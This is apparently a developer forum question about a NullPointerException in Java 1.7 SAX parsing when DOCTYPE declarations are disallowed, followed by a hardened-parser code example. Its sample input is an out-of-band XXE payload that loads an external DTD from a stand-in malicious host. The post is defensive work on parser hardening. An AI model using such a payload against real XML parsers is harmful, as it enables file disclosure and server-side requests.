I have set the "http://apache.org/xml/features/disallow-doctype-decl" feature to true on SAXParserFactory, and I get a NullPointerException when parsing XML that contains an external entity.
Code:
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://malicioushost/xxe.xml" > %remote; %payload;]>
Error:
Caused by: java.lang.NullPointerException: null
at com.sun.org.apache.xerces.internal.impl.dtd.XMLDTDProcessor.startDTD(XMLDTDProcessor.java:679) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:341) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1098) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1047) ~[na:1.7.0]
Does anyone know what additional settings should be applied to avoid the NPE?
I am using Java version: 1.7.0_51
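
For reference, an added example (not code from the original post): a SAXParserFactory hardened with the feature from the question plus the other entity-related features commonly set alongside it, parsing constructed in-memory documents so nothing is fetched. The class and method names are hypothetical; it shows the behaviour the Xerces documentation describes for this feature (a fatal SAXParseException on any DOCTYPE), not the NPE in the stack trace above.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedSaxDemo {

    // Build a factory that refuses DOCTYPE declarations and, as defence in
    // depth, also disables external entities and external DTD loading.
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setNamespaceAware(true);
        spf.setXIncludeAware(false);
        spf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return spf;
    }

    // Parse a document and report whether the parser accepted or rejected it.
    // DefaultHandler rethrows fatal errors, so a forbidden DOCTYPE surfaces
    // here as a SAXParseException instead of being silently processed.
    static String parse(String xml) throws Exception {
        SAXParser parser = hardenedFactory().newSAXParser();
        try {
            parser.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
                         new DefaultHandler());
            return "accepted";
        } catch (SAXParseException e) {
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs: one plain document, one carrying a DOCTYPE
        // with an internal entity (no network access is involved).
        String plain = "<root>ok</root>";
        String withDoctype = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE root [<!ENTITY e \"x\">]><root>&e;</root>";
        System.out.println(parse(plain));
        System.out.println(parse(withDoctype));
    }
}
```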